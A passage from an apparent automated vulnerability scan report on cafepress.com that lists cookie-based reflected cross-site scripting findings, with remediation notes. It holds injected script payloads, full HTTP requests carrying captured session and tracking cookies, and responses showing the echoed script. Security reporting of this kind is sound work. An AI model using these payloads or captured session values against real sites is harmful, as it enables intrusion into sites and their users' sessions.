The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a79f</script><script>alert(1)</script>f30bd18751f was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4a79f</script><script>alert(1)</script>f30bd18751f ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 ntCoent-Length: 41343 Date: Sun, 26 Dec 2010 13:46:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 41343 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... ryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/cp/addtocart.aspx' window.cafepress.tealeaf.searchTerm = '4a79f</script><script>alert(1)</script>f30bd18751f ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/about/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4954"-alert(1)-"ab20618713b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 46269 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 46269 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/about/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d2b</script><script>alert(1)</script>e9999fa4cb2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/about/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=55d2b</script><script>alert(1)</script>e9999fa4cb2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 46295 Date: Sun, 26 Dec 2010 13:46:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 46295 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... .com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/info/about/index.aspx' window.cafepress.tealeaf.searchTerm = '55d2b</script><script>alert(1)</script>e9999fa4cb2 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/help/index.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe61"-alert(1)-"a4da02b5a1a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 58704 Date: Sun, 26 Dec 2010 13:46:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58704 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/help/index.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1161</script><script>alert(1)</script>2e613423535 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1161</script><script>alert(1)</script>2e613423535 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 58725 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58725 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HelpPage' window.cafepress.tealeaf.searchTerm = 'f1161</script><script>alert(1)</script>2e613423535 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/help/tos.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d434d"-alert(1)-"e31525dd84b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/tos.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 